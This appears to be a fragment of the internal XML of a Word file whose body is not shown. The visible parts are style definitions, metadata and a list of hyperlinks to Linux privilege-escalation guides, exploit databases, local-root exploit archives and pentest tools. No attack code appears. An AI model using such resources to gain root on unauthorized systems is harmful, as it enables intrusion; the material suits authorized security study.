          <w:t>http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00464CF6" w:rsidRPr="00B74EA4" w:rsidRDefault="00464CF6"/>
    <w:sectPr w:rsidR="00464CF6" w:rsidRPr="00B74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3592A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9B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A6"/>
    <w:rsid w:val="000D42C8"/>
    <w:rsid w:val="002704A6"/>
    <w:rsid w:val="0029643B"/>
    <w:rsid w:val="00464CF6"/>
    <w:rsid w:val="00B7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4477"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C15381BE-F926-4935-8FAA-174B7D83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4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4E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B74E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E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4E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B74EA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B74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ta">
    <w:name w:val="meta"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00B74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4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4EA4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00B74EA4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B74EA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74EA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4E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4EA4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B74EA4"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B74EA4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B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="err">
    <w:name w:val="err"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m">
    <w:name w:val="m"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sb">
    <w:name w:val="sb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B74EA4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B7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" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://metasploit.com/modules/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20111118031158/http:/tarantula.by.ru/localroot/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall0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bs.portcullis.co.uk/application/enum4linux/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploitsearch.net/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jon.oberheide.org/files/stackjacking-infiltrate1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" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/unix-privesc-check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wtoforge.com/port-forwarding-with-rinetd-on-debian-etch" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microloft.co.uk/hacking/hacking3.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists.org/fulldisclosure/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.0daysecurity.com/penetration-testing/enumeration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ecuriteam.com/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kecepatan.66ghz.com/file/local-root-exploit-priv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37day.com/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityreason.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bastille-linux.sourceforge.net/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privile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1869</Words>
  <Characters>10655</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>88</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company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2019-10-23T06:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-23T06:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>